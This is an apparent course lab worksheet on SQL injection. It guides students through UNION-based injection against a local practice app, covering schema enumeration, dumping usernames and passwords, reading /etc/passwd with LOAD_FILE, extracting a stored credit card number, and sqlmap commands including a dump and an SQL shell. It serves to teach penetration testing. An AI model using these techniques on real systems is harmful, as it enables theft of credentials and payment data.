14

Network Penetration Testing

Penetration Testing IntroPen Testing Process and LawPlanning and Passive ReconPort ScanningPractice QuestionsForged Emails (Lab 4b)Introduction to Basic Exploits (Lab 5)Metasploit Framework (Lab 6)Web Application Technologies/Vulnerabilities (Lab 7)Apache Web Application Configuration (Lab 8a)Web Application Testing (Lab 8b)SQL Injection Testing/Attacks (Lab 9)Password Attacks (Lab 10)Active Recon - Network Scanning, Enumeration and Vulnerability Scanning (Lab 4a)

SQL Injection Testing/Attacks (Lab 9)

Last Update Unknown

A space is required after the comment tag at the end of SQL Injection (%20 for URL or a space character can be used)

Question 2: Db Testing - SQL Injection Methodology

In a browser window, navigate to:

A %20 is needed as a space character is required at the end

Find out the name of the table being queried using fuzzing.

Take your previous SQL injection you used to work out the number of columns and add to the end "from TABLENAME", where the TABLENAME needs to be guessed. As this is all about stock and inventory, try one of the following tablename candidates:

stock

stocklist

stockinfo

items

inventory

stockinventory

iteminventory

investorylist

Find out the name of one of the columns in this table using fuzzing.

Combine your previous SQL injection which you used to work out the number of columns, and replace one of the NULL entries with a guess as to the item codes column name. Try the following candidates:

code

item

id

barcode

itemid

codeid

barid

idcode

Find out the name of another missing column in this table using fuzzing.

Combine your previous SQL injection and replace one of the other NULL entries with a guess as to the item codes column name. As this is about stock it seems plausable that the missing column is about how much stock is available. Try the following candidates:

stockno

stocknumber

itemsinstock

instock

totalstock

totalitems

total

available

itemsavailable

Recall your first injection where you discovered all the items in the database and their codes? Use that to find the row for milk in this injection. How much milk is in stock?

In your SELECT injection go back to the example with all columns NULL. Explore the metadata of the database using this UNION SELECT hack, making use of the first NULL to run some additional functions.

Use the first attribute and find out the username of the database user being hacked. This is in the form of "thename@machinename". This is done using a mysql function.

Use the first attribute and find out the version of the mysql database being hacked. This is done using a mysql variable. The output with have numbers, dots, minus signs, and potentially extra information after a plus character.

Use the first attribute and find out the name of the database (i.e. the schema name) which we are using. This is a mysql function.

With the database name and your SQL injection, use your injection and with the first NULL column change that to select the "table_name" from "information_schema.tables", restricting your query to those which have the "table_schema" set to the database name identified above.

Using "information_schema.columns", what are the column names (known as column_name) of the table which you suspect of being the user information table in this database schema? In your query restrict the injected query to only the correct table_schema and table_name. Enter the column names in alphabetical order.

Now extend your original SQL injection, using the name of the application user's table and the newly discovered column names to access the application's user table information, showing the usernames and passwords.

What is the password for user "clever"?

Again extending your original SQL injection, make use of the LOAD_FILE function to access /etc/passwd. The password file has the following repeating format:

username:x:userid:groupid:/home:/bin/bash

Using this information, what is the first username seen in /etc/passwd using this injection?

The output of the above is a little messy to read. Use the CONCAT command and concat the output of LOAD_FILE between the html strings "<pre>" and "</pre>" Repeat your experiment with this new formatting...

Using this information, what is the userid for the username ntp? In /etc/passwd, columns are seperated by ':', and userid is column 3.

Question 3: More SQLi Fun

Consider the script /cgi-bin/card.pl

Although this is technically using the POST method, the script takes information via the GET method too, as this makes life a lot nicer for us!

Look at the html source for the form. What is the name of the text box?

Try looking at "tony", using a GET request. His credit card details are obscured...

Inject SQL to negate the test restricting the checks to "tony", so that all user's details can be returned.

How many credit cards are stored in the database?

How many columns are used in the SQL query related to this injection attack in card.pl?

Number of columns that it confirms in the SQL query:

Which of the columns is the one related to the credit card number? Inject the card "9999-9999-9999-9999" into each column and see which appears in the output.

Column number of the card column (numbered from 1).

On the basis that the credit card information is held in a table called "ccards", and the username field is "uname" and the credit card number in "code", use substring and concat to access characters 1-4 of the credit card number associated with "tony".

BE WARNED. The format of the credit card number has to be groups of 4 with hyphens or the script will block the display.

Digits 1-4 of tony's card

Continue that technique and build tony's complete credit card number.

Tony's complete card in the form XXXX-XXXX-XXXX-XXXX.

Question 4: SQli Tools: SQL Map

Not you have seen the weaknesses that exist in the two target scripts, and exploited those manually... now experience the power of the automated tools!

Use sqlmap from a Kali Linux terminal window to fingerprint the target app and db. Use the same injection point:

http://127.0.0.1/cgi-bin/stock.pl?code=

Run sqlmap on the URL, and enumerate all of the Db's, and the current User and Db

sqlmap -u http://127.0.0.1/cgi-bin/stock.pl?code= -f -b -v 2 --dbs --current-user --current-db

What does sqlmap say is the number of databases?

Enumerate Db Tables and Columns

Now keep the same injection point, but this time use only "--tables" and "--columns" using only "-D hack". Use this information to discover the maximum VARCHAR length of "uname" in the "ccards" table.

Retrieve Data From Db Table

Keeping the same injection point and database, but this time lets query soem user data. Try to "dump" the "table" ccards data using sqlmap. Use the man page to discover how to "dump" and how to select a specific "T"able. You still need the "-D hack" Use this information to view the whole of the ccard table data.

When does Tony's card expire? Use the format 12/99 expiry

SQLMap SQL Shell

Again using sqlmap, with the same injection point and database, use the "--sql-shell" flag to open a SQL interface to the database via the injection point.

Use that to run the SQL command:

select * from theusers;

Who has the password "magic"?